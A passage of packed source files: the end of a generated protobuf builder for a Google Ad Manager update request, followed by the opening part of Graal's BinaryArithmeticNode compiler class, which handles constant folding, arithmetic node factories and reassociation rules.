<code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000002); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000002; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * * * <pre> * Required. The list of fields to update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) } // @@protoc_insertion_point(class_scope:google.ads.admanager.v1.UpdatePrivateAuctionDealRequest) private static final com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest(); } public static com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<UpdatePrivateAuctionDealRequest> PARSER = new com.google.protobuf.AbstractParser<UpdatePrivateAuctionDealRequest>() { @java.lang.Override public UpdatePrivateAuctionDealRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<UpdatePrivateAuctionDealRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<UpdatePrivateAuctionDealRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.admanager.v1.UpdatePrivateAuctionDealRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
oracle/graal
36,066
compiler/src/jdk.graal.compiler/src/jdk/graal/compiler/nodes/calc/BinaryArithmeticNode.java
/* * Copyright (c) 2009, 2025, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package jdk.graal.compiler.nodes.calc; import static jdk.graal.compiler.nodeinfo.NodeCycles.CYCLES_1; import static jdk.graal.compiler.nodeinfo.NodeSize.SIZE_1; import java.util.Arrays; import jdk.graal.compiler.core.common.type.ArithmeticOpTable; import jdk.graal.compiler.core.common.type.ArithmeticOpTable.BinaryOp; import jdk.graal.compiler.core.common.type.ArithmeticStamp; import jdk.graal.compiler.core.common.type.FloatStamp; import jdk.graal.compiler.core.common.type.IntegerStamp; import jdk.graal.compiler.core.common.type.Stamp; import jdk.graal.compiler.debug.Assertions; import jdk.graal.compiler.debug.GraalError; import jdk.graal.compiler.graph.Graph; import jdk.graal.compiler.graph.Node; import jdk.graal.compiler.graph.NodeClass; import jdk.graal.compiler.graph.iterators.NodePredicate; import jdk.graal.compiler.nodeinfo.NodeInfo; import jdk.graal.compiler.nodes.ArithmeticOperation; import jdk.graal.compiler.nodes.ConstantNode; import jdk.graal.compiler.nodes.NodeView; import jdk.graal.compiler.nodes.StructuredGraph; import jdk.graal.compiler.nodes.ValueNode; import jdk.graal.compiler.nodes.ValuePhiNode; import jdk.graal.compiler.nodes.extended.GuardedNode; import jdk.graal.compiler.nodes.spi.ArithmeticLIRLowerable; import jdk.graal.compiler.nodes.spi.Canonicalizable; import jdk.graal.compiler.nodes.spi.CanonicalizerTool; import jdk.graal.compiler.nodes.spi.NodeValueMap; import jdk.vm.ci.meta.Constant; @NodeInfo(cycles = CYCLES_1, size = SIZE_1) public abstract class BinaryArithmeticNode<OP> extends BinaryNode implements ArithmeticOperation, ArithmeticLIRLowerable, Canonicalizable.Binary<ValueNode> { @SuppressWarnings("rawtypes") public static final NodeClass<BinaryArithmeticNode> TYPE = NodeClass.create(BinaryArithmeticNode.class); protected BinaryArithmeticNode(NodeClass<? extends BinaryArithmeticNode<OP>> c, BinaryOp<OP> opForStampComputation, ValueNode x, ValueNode y) { super(c, opForStampComputation.foldStamp(x.stamp(NodeView.DEFAULT), y.stamp(NodeView.DEFAULT)), x, y); } protected BinaryArithmeticNode(NodeClass<? extends BinaryArithmeticNode<OP>> c, Stamp stamp, ValueNode x, ValueNode y) { super(c, stamp, x, y); } public static ArithmeticOpTable getArithmeticOpTable(ValueNode forValue) { return ArithmeticOpTable.forStamp(forValue.stamp(NodeView.DEFAULT)); } protected abstract BinaryOp<OP> getOp(ArithmeticOpTable table); protected final BinaryOp<OP> getOp(ValueNode forX, ValueNode forY) { ArithmeticOpTable table = getArithmeticOpTable(forX); assert table.equals(getArithmeticOpTable(forY)) : Assertions.errorMessage("Invalid table ops", forX, table, forY, getArithmeticOpTable(forY)); return getOp(table); } @Override public final BinaryOp<OP> getArithmeticOp() { return getOp(getX(), getY()); } @Override public ValueNode canonical(CanonicalizerTool tool, ValueNode forX, ValueNode forY) { NodeView view = NodeView.from(tool); ValueNode result = tryConstantFold(getOp(forX, forY), forX, forY, stamp(view), view); if (result != null) { return result; } if (forX instanceof ConditionalNode && forY.isConstant() && forX.hasExactlyOneUsage()) { ConditionalNode conditionalNode = (ConditionalNode) forX; BinaryOp<OP> arithmeticOp = getArithmeticOp(); ConstantNode trueConstant = tryConstantFold(arithmeticOp, conditionalNode.trueValue(), forY, this.stamp(view), view); if (trueConstant != null) { ConstantNode falseConstant = tryConstantFold(arithmeticOp, conditionalNode.falseValue(), forY, this.stamp(view), view); if (falseConstant != null) { // @formatter:off /* The arithmetic is folded into a constant on both sides of the conditional. * Example: * (cond ? -5 : 5) + 100 * canonicalizes to: * (cond ? 95 : 105) */ // @formatter:on return ConditionalNode.create(conditionalNode.condition, trueConstant, falseConstant, view); } } } return this; } @SuppressWarnings("unused") public static <OP> ConstantNode tryConstantFold(BinaryOp<OP> op, ValueNode forX, ValueNode forY, Stamp stamp, NodeView view) { if (forX.isConstant() && forY.isConstant()) { Constant ret = op.foldConstant(forX.asConstant(), forY.asConstant()); if (ret != null) { return ConstantNode.forPrimitive(stamp, ret); } } return null; } @Override public Stamp foldStamp(Stamp stampX, Stamp stampY) { assert stampX.isCompatible(x.stamp(NodeView.DEFAULT)) : Assertions.errorMessageContext("this", this, "xStamp", x.stamp(NodeView.DEFAULT), "stampX", stampX); assert stampY.isCompatible(y.stamp(NodeView.DEFAULT)) : Assertions.errorMessageContext("this", this, "xStamp", x.stamp(NodeView.DEFAULT), "stampX", stampX); return getArithmeticOp().foldStamp(stampX, stampY); } public static ValueNode binaryIntegerOp(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view, BinaryOp<?> op) { return graph.addOrUniqueWithInputs(binaryIntegerOp(v1, v2, view, op)); } public static ValueNode binaryIntegerOp(ValueNode v1, ValueNode v2, NodeView view, BinaryOp<?> op) { if (IntegerStamp.OPS.getAdd().equals(op)) { return add(v1, v2, view); } else if (IntegerStamp.OPS.getSub().equals(op)) { return sub(v1, v2, view); } else if (IntegerStamp.OPS.getMul().equals(op)) { return mul(v1, v2, view); } else if (IntegerStamp.OPS.getRem().equals(op)) { return rem(v1, v2, view); } else if (IntegerStamp.OPS.getAnd().equals(op)) { return and(v1, v2, view); } else if (IntegerStamp.OPS.getOr().equals(op)) { return or(v1, v2, view); } else if (IntegerStamp.OPS.getXor().equals(op)) { return xor(v1, v2, view); } else if (IntegerStamp.OPS.getShl().equals(op)) { return shl(v1, v2, view); } else if (IntegerStamp.OPS.getUShr().equals(op)) { return ushr(v1, v2, view); } else if (IntegerStamp.OPS.getShr().equals(op)) { return shr(v1, v2, view); } else if (IntegerStamp.OPS.getMax().equals(op)) { return max(v1, v2, view); } else if (IntegerStamp.OPS.getMin().equals(op)) { return min(v1, v2, view); } else if (IntegerStamp.OPS.getUMax().equals(op)) { return umax(v1, v2, view); } else if (IntegerStamp.OPS.getUMin().equals(op)) { return umin(v1, v2, view); } else if (Arrays.asList(IntegerStamp.OPS.getBinaryOps()).contains(op)) { GraalError.unimplemented(String.format("creating %s via BinaryArithmeticNode#binaryIntegerOp is not implemented yet", op)); } else { GraalError.shouldNotReachHere(String.format("%s is not a binary operation!", op)); } return null; } public static ValueNode binaryFloatOp(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view, BinaryOp<?> op) { return graph.addOrUniqueWithInputs(binaryFloatOp(v1, v2, view, op)); } public static ValueNode binaryFloatOp(ValueNode v1, ValueNode v2, NodeView view, BinaryOp<?> op) { if (FloatStamp.OPS.getAdd().equals(op)) { return add(v1, v2, view); } else if (FloatStamp.OPS.getSub().equals(op)) { return sub(v1, v2, view); } else if (FloatStamp.OPS.getMul().equals(op)) { return mul(v1, v2, view); } else if (FloatStamp.OPS.getDiv().equals(op)) { return FloatDivNode.create(v1, v2, view); } else if (FloatStamp.OPS.getAnd().equals(op)) { return and(v1, v2, view); } else if (FloatStamp.OPS.getOr().equals(op)) { return or(v1, v2, view); } else if (FloatStamp.OPS.getXor().equals(op)) { return xor(v1, v2, view); } else if (FloatStamp.OPS.getMax().equals(op)) { return max(v1, v2, view); } else if (FloatStamp.OPS.getMin().equals(op)) { return min(v1, v2, view); } else if (Arrays.asList(FloatStamp.OPS.getBinaryOps()).contains(op)) { GraalError.unimplemented(String.format("creating %s via BinaryArithmeticNode#binaryFloatOp is not implemented yet", op)); } else { GraalError.shouldNotReachHere(String.format("%s is not a binary operation!", op)); } return null; } public static ValueNode add(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(AddNode.create(v1, v2, view)); } public static ValueNode add(ValueNode v1, ValueNode v2, NodeView view) { return AddNode.create(v1, v2, view); } public static ValueNode add(ValueNode v1, ValueNode v2) { return add(v1, v2, NodeView.DEFAULT); } public static ValueNode sub(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(SubNode.create(v1, v2, view)); } public static ValueNode sub(ValueNode v1, ValueNode v2, NodeView view) { return SubNode.create(v1, v2, view); } public static ValueNode sub(ValueNode v1, ValueNode v2) { return sub(v1, v2, NodeView.DEFAULT); } public static ValueNode mul(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(MulNode.create(v1, v2, view)); } public static ValueNode mul(ValueNode v1, ValueNode v2, NodeView view) { return MulNode.create(v1, v2, view); } public static ValueNode mul(ValueNode v1, ValueNode v2) { return mul(v1, v2, NodeView.DEFAULT); } public static ValueNode rem(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(RemNode.create(v1, v2, view)); } public static ValueNode rem(ValueNode v1, ValueNode v2, NodeView view) { return RemNode.create(v1, v2, view); } public static ValueNode rem(ValueNode v1, ValueNode v2) { return rem(v1, v2, NodeView.DEFAULT); } public static ValueNode and(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(AndNode.create(v1, v2, view)); } public static ValueNode and(ValueNode v1, ValueNode v2, NodeView view) { return AndNode.create(v1, v2, view); } public static ValueNode and(ValueNode v1, ValueNode v2) { return and(v1, v2, NodeView.DEFAULT); } public static ValueNode or(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(OrNode.create(v1, v2, view)); } public static ValueNode or(ValueNode v1, ValueNode v2, NodeView view) { return OrNode.create(v1, v2, view); } public static ValueNode or(ValueNode v1, ValueNode v2) { return or(v1, v2, NodeView.DEFAULT); } public static ValueNode xor(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(XorNode.create(v1, v2, view)); } public static ValueNode xor(ValueNode v1, ValueNode v2, NodeView view) { return XorNode.create(v1, v2, view); } public static ValueNode xor(ValueNode v1, ValueNode v2) { return xor(v1, v2, NodeView.DEFAULT); } public static ValueNode max(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(MaxNode.create(v1, v2, view)); } public static ValueNode max(ValueNode v1, ValueNode v2, NodeView view) { return MaxNode.create(v1, v2, view); } public static ValueNode max(ValueNode v1, ValueNode v2) { return max(v1, v2, NodeView.DEFAULT); } public static ValueNode min(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(MinNode.create(v1, v2, view)); } public static ValueNode min(ValueNode v1, ValueNode v2, NodeView view) { return MinNode.create(v1, v2, view); } public static ValueNode min(ValueNode v1, ValueNode v2) { return min(v1, v2, NodeView.DEFAULT); } public static ValueNode umax(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(UnsignedMaxNode.create(v1, v2, view)); } public static ValueNode umax(ValueNode v1, ValueNode v2, NodeView view) { return UnsignedMaxNode.create(v1, v2, view); } public static ValueNode umax(ValueNode v1, ValueNode v2) { return umax(v1, v2, NodeView.DEFAULT); } public static ValueNode umin(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(UnsignedMinNode.create(v1, v2, view)); } public static ValueNode umin(ValueNode v1, ValueNode v2, NodeView view) { return UnsignedMinNode.create(v1, v2, view); } public static ValueNode umin(ValueNode v1, ValueNode v2) { return umin(v1, v2, NodeView.DEFAULT); } public static ValueNode shl(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(LeftShiftNode.create(v1, v2, view)); } public static ValueNode shl(ValueNode v1, ValueNode v2, NodeView view) { return LeftShiftNode.create(v1, v2, view); } public static ValueNode shl(ValueNode v1, ValueNode v2) { return shl(v1, v2, NodeView.DEFAULT); } public static ValueNode shr(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(RightShiftNode.create(v1, v2, view)); } public static ValueNode shr(ValueNode v1, ValueNode v2, NodeView view) { return RightShiftNode.create(v1, v2, view); } public static ValueNode shr(ValueNode v1, ValueNode v2) { return shr(v1, v2, NodeView.DEFAULT); } public static ValueNode ushr(StructuredGraph graph, ValueNode v1, ValueNode v2, NodeView view) { return graph.addOrUniqueWithInputs(UnsignedRightShiftNode.create(v1, v2, view)); } public static ValueNode ushr(ValueNode v1, ValueNode v2, NodeView view) { return UnsignedRightShiftNode.create(v1, v2, view); } public static ValueNode ushr(ValueNode v1, ValueNode v2) { return ushr(v1, v2, NodeView.DEFAULT); } public static ValueNode branchlessMin(ValueNode v1, ValueNode v2, NodeView view) { if (v1.isDefaultConstant() && !v2.isDefaultConstant()) { return branchlessMin(v2, v1, view); } int bits = ((IntegerStamp) v1.stamp(view)).getBits(); assert ((IntegerStamp) v2.stamp(view)).getBits() == bits : bits + " and v2 " + v2; ValueNode t1 = sub(v1, v2, view); ValueNode t2 = RightShiftNode.create(t1, bits - 1, view); ValueNode t3 = AndNode.create(t1, t2, view); return add(v2, t3, view); } public static ValueNode branchlessMax(ValueNode v1, ValueNode v2, NodeView view) { if (v1.isDefaultConstant() && !v2.isDefaultConstant()) { return branchlessMax(v2, v1, view); } int bits = ((IntegerStamp) v1.stamp(view)).getBits(); assert ((IntegerStamp) v2.stamp(view)).getBits() == bits : bits + " and v2 " + v2; if (v2.isDefaultConstant()) { // prefer a & ~(a>>31) to a - (a & (a>>31)) return AndNode.create(v1, NotNode.create(RightShiftNode.create(v1, bits - 1, view)), view); } else { ValueNode t1 = sub(v1, v2, view); ValueNode t2 = RightShiftNode.create(t1, bits - 1, view); ValueNode t3 = AndNode.create(t1, t2, view); return sub(v1, t3, view); } } private enum ReassociateMatch { x, y; public ValueNode getValue(BinaryNode binary) { switch (this) { case x: return binary.getX(); case y: return binary.getY(); default: throw GraalError.shouldNotReachHereUnexpectedValue(this); // ExcludeFromJacocoGeneratedReport } } public ValueNode getOtherValue(BinaryNode binary) { switch (this) { case x: return binary.getY(); case y: return binary.getX(); default: throw GraalError.shouldNotReachHereUnexpectedValue(this); // ExcludeFromJacocoGeneratedReport } } } private static ReassociateMatch findReassociate(BinaryNode binary, NodePredicate criterion) { boolean resultX = criterion.apply(binary.getX()); boolean resultY = criterion.apply(binary.getY()); if (resultX && !resultY) { return ReassociateMatch.x; } if (!resultX && resultY) { return ReassociateMatch.y; } return null; } private static ReassociateMatch findReassociate(BinaryArithmeticNode<?> parent, ValueNode child, NodePredicate criterion) { if (!isReassociative(parent, child)) { return null; } // "child" should be single used to "parent", or it might be not worth for the // re-association. if (child.hasExactlyOneUsage() && child.usages().first().equals(parent)) { return findReassociate((BinaryNode) child, criterion); } return null; } private static boolean isReassociative(BinaryArithmeticNode<?> parent, ValueNode child) { if (!parent.mayReassociate()) { return false; } if (isNonExactAddOrSub(parent)) { return isNonExactAddOrSub(child); } return child.getClass() == parent.getClass(); } /** * Determines whether this operation may be reassociated in the sense of * {@link #reassociateUnmatchedValues} and {@link #reassociateMatchedValues}. These methods can * perform transformations like {@code (a * 2) * b => (a * b) * 2}. In general, these * transformations require the binary operation to be both {@linkplain BinaryOp#isAssociative() * associative} to allow shifting of parentheses and {@linkplain BinaryOp#isCommutative() * commutative} to allow changing the order of the operands. * <p/> * As a special case, subtraction on integers allows certain similar transformations, especially * in expressions where it is mixed with addition. For example, * {@link #reassociateUnmatchedValues} can transform {@code x + (C - y) -> (x - y) + C}, and * {@link SubNode#canonical(CanonicalizerTool, ValueNode, ValueNode)} can transform * {@code a - (a + b) -> -b}. Therefore this method returns {@code true} for integer * subtraction. Users of this method must still check if the operation in question is * subtraction and ensure that they only reassociate subtractions in sound ways. Floating-point * subtraction does not permit such mathematically sound transformations due to rounding errors. */ public boolean mayReassociate() { return mayReassociate(getArithmeticOp(), stamp(NodeView.DEFAULT)); } /** * Determines whether the {@code op} may be reassociated in the sense of * {@link #reassociateUnmatchedValues} and {@link #reassociateMatchedValues}. * * @see #mayReassociate() */ public static boolean mayReassociate(BinaryOp<?> op, Stamp stamp) { return (op.isAssociative() && op.isCommutative()) || (stamp.isIntegerStamp() && op.equals(((ArithmeticStamp) stamp).getOps().getSub())); } /** * Tries to push down values which satisfy the criterion. This is an assistant function for * {@linkplain BinaryArithmeticNode#reassociateMatchedValues}. For example with a constantness * criterion: {@code (a * 2) * b => (a * b) * 2} * * <p> * This method accepts only {@linkplain #mayReassociate() operations that allow reassociation} * such as +, -, *, &amp;, |, ^, min, and max. */ public static ValueNode reassociateUnmatchedValues(BinaryArithmeticNode<?> node, NodePredicate criterion, NodeView view) { ValueNode forX = node.getX(); ValueNode forY = node.getY(); BinaryOp<?> op = node.getOp(forX, forY); GraalError.guarantee(node.mayReassociate(), "%s: binary op %s does not satisfy precondition of reassociateUnmatchedValues", node, op); // No need to re-associate if one of the operands has matched the criterion. if (criterion.apply(forX) || criterion.apply(forY)) { return node; } // Find the operand that could be re-associated with its parent node. ReassociateMatch match = findReassociate(node, forX, criterion); BinaryNode matchBinary = null; ValueNode otherValue1 = null; if (match != null) { matchBinary = (BinaryNode) forX; otherValue1 = forY; } else { match = findReassociate(node, forY, criterion); if (match != null) { matchBinary = (BinaryNode) forY; otherValue1 = forX; } } if (match == null) { return node; } assert matchBinary != null; assert otherValue1 != null; ValueNode matchValue = match.getValue(matchBinary); ValueNode otherValue2 = match.getOtherValue(matchBinary); if (isNonExactAddOrSub(node)) { //@formatter:off /** * Re-association for the following patterns: * * x + (y + C) -> (x + y) + C * x + (y - C) -> (x + y) - C * x + (C - y) -> (x - y) + C * * x - (C - y) -> (x + y) - C * x - (y - C) -> (x - y) + C * x - (C + y) -> (x - y) - C * * (C - x) - y -> C - (x + y) * (x - C) - y -> (x - y) - C * (C + x) - y -> (x - y) + C */ //@formatter:on boolean addSub = isNonExactAdd(node) && isNonExactSub(matchBinary); boolean subAdd = isNonExactSub(node) && isNonExactAdd(matchBinary); boolean subSub = isNonExactSub(node) && isNonExactSub(matchBinary); boolean sub = false; boolean invertSub = false; if (addSub) { sub = match == ReassociateMatch.y; } else if (subAdd) { sub = matchBinary == forY; } else if (subSub) { sub = (matchBinary == forX && match == ReassociateMatch.y) || (matchBinary == forY && match == ReassociateMatch.x); invertSub = matchBinary == forX && match == ReassociateMatch.x; } // For patterns like "(x - C) - y" and "(C + x) - y", swap the operands of association. if (node instanceof SubNode && matchBinary == forX) { ValueNode temp = otherValue1; otherValue1 = otherValue2; otherValue2 = temp; } ValueNode associated; if (subAdd || (addSub && match == ReassociateMatch.x) || (subSub && match == ReassociateMatch.y)) { associated = BinaryArithmeticNode.sub(otherValue1, otherValue2, view); } else { associated = BinaryArithmeticNode.add(otherValue1, otherValue2, view); } if (invertSub) { return BinaryArithmeticNode.sub(matchValue, associated, view); } else if (sub) { return BinaryArithmeticNode.sub(associated, matchValue, view); } else { return BinaryArithmeticNode.add(associated, matchValue, view); } } else if (isNonExactMul(node)) { // Re-association from "x * (y * C)" to "(x * y) * C" return BinaryArithmeticNode.mul(matchValue, BinaryArithmeticNode.mul(otherValue1, otherValue2, view), view); } else if (node instanceof AndNode) { // Re-association from "x & (y & C)" to "(x & y) & C" return AndNode.create(matchValue, AndNode.create(otherValue1, otherValue2, view), view); } else if (node instanceof OrNode) { // Re-association from "x | (y | C)" to "(x | y) | C" return OrNode.create(matchValue, OrNode.create(otherValue1, otherValue2, view), view); } else if (node instanceof XorNode) { // Re-association from "x ^ (y ^ C)" to "(x ^ y) ^ C" return XorNode.create(matchValue, XorNode.create(otherValue1, otherValue2, view), view); } else if (node instanceof MinNode) { // Re-association from "min(x, min(y, C))" to "min(min(x, y), C)" return MinNode.create(matchValue, MinNode.create(otherValue1, otherValue2, view), view); } else if (node instanceof MaxNode) { // Re-association from "max(x, max(y, C))" to "max(max(x, y), C)" return MaxNode.create(matchValue, MaxNode.create(otherValue1, otherValue2, view), view); } else if (node instanceof UnsignedMinNode) { // Re-association from "umin(x, umin(y, C))" to "umin(umin(x, y), C)" return UnsignedMinNode.create(matchValue, UnsignedMinNode.create(otherValue1, otherValue2, view), view); } else if (node instanceof UnsignedMaxNode) { // Re-association from "umax(x, umax(y, C))" to "umax(umax(x, y), C)" return UnsignedMaxNode.create(matchValue, UnsignedMaxNode.create(otherValue1, otherValue2, view), view); } else { throw GraalError.shouldNotReachHere("unhandled node in reassociation with constants: " + node); // ExcludeFromJacocoGeneratedReport } } //@formatter:off /* * In reassociate, complexity comes from the handling of IntegerSub (non commutative) which can * be mixed with IntegerAdd. It first tries to find m1, m2 which match the criterion : * (a o m2) o m1 * (m2 o a) o m1 * m1 o (a o m2) * m1 o (m2 o a) * It then produces 4 boolean for the -/+ cases: * invertA : should the final expression be like *-a (rather than a+*) * aSub : should the final expression be like a-* (rather than a+*) * invertM1 : should the final expression contain -m1 * invertM2 : should the final expression contain -m2 * */ //@formatter:on /** * Tries to re-associate values which satisfy the criterion. For example with a constantness * criterion: {@code (a + 2) + 1 => a + (1 + 2)} * <p> * This method accepts only {@linkplain #mayReassociate() operations that allow reassociation} * such as +, -, *, &amp;, |, ^, min, and max. * * @param forY * @param forX */ public static ValueNode reassociateMatchedValues(BinaryArithmeticNode<?> node, NodePredicate criterion, ValueNode forX, ValueNode forY, NodeView view) { BinaryOp<?> op = node.getOp(forX, forY); GraalError.guarantee(node.mayReassociate(), "%s: binary op %s does not satisfy precondition of reassociateMatchedValues", node, op); ReassociateMatch match1 = findReassociate(node, criterion); if (match1 == null) { return node; } if (isExactMathOperation(node)) { return node; } if (node instanceof GuardedNode && ((GuardedNode) node).getGuard() != null) { // cannot re-associate guarded nodes return node; } ValueNode otherValue = match1.getOtherValue(node); boolean addSub = false; boolean subAdd = false; if (otherValue.getClass() != node.getClass()) { if (isNonExactAdd(node) && isNonExactSub(otherValue)) { addSub = true; } else if (isNonExactSub(node) && isNonExactAdd(otherValue)) { subAdd = true; } else { return node; } } BinaryNode other = (BinaryNode) otherValue; ReassociateMatch match2 = findReassociate(other, criterion); if (match2 == null) { return node; } if (isExactMathOperation(other)) { return node; } boolean invertA = false; boolean aSub = false; boolean invertM1 = false; boolean invertM2 = false; if (addSub) { invertM2 = match2 == ReassociateMatch.y; invertA = !invertM2; } else if (subAdd) { invertA = invertM2 = match1 == ReassociateMatch.x; invertM1 = !invertM2; } else if (isNonExactSub(node) && isNonExactSub(other)) { invertA = match1 == ReassociateMatch.x ^ match2 == ReassociateMatch.x; aSub = match1 == ReassociateMatch.y && match2 == ReassociateMatch.y; invertM1 = match1 == ReassociateMatch.y && match2 == ReassociateMatch.x; invertM2 = match1 == ReassociateMatch.x && match2 == ReassociateMatch.x; } assert !(invertM1 && invertM2) && !(invertA && aSub) : Assertions.errorMessageContext("node", node, "invertM1", invertM1, "invertM2", invertM2, "invertA", invertA, "aSub", aSub); ValueNode m1 = match1.getValue(node); ValueNode m2 = match2.getValue(other); ValueNode a = match2.getOtherValue(other); if (isNonExactAddOrSub(node)) { ValueNode associated; if (invertM1) { associated = BinaryArithmeticNode.sub(m2, m1, view); } else if (invertM2) { associated = BinaryArithmeticNode.sub(m1, m2, view); } else { associated = BinaryArithmeticNode.add(m1, m2, view); } if (invertA) { return BinaryArithmeticNode.sub(associated, a, view); } if (aSub) { return BinaryArithmeticNode.sub(a, associated, view); } return BinaryArithmeticNode.add(a, associated, view); } else if (isNonExactMul(node)) { return BinaryArithmeticNode.mul(a, mul(m1, m2, view), view); } else if (node instanceof AndNode) { return AndNode.create(a, AndNode.create(m1, m2, view), view); } else if (node instanceof OrNode) { return OrNode.create(a, OrNode.create(m1, m2, view), view); } else if (node instanceof XorNode) { return XorNode.create(a, XorNode.create(m1, m2, view), view); } else if (node instanceof MaxNode) { return MaxNode.create(a, MaxNode.create(m1, m2, view), view); } else if (node instanceof MinNode) { return MinNode.create(a, MinNode.create(m1, m2, view), view); } else if (node instanceof UnsignedMaxNode) { return UnsignedMaxNode.create(a, UnsignedMaxNode.create(m1, m2, view), view); } else if (node instanceof UnsignedMinNode) { return UnsignedMinNode.create(a, 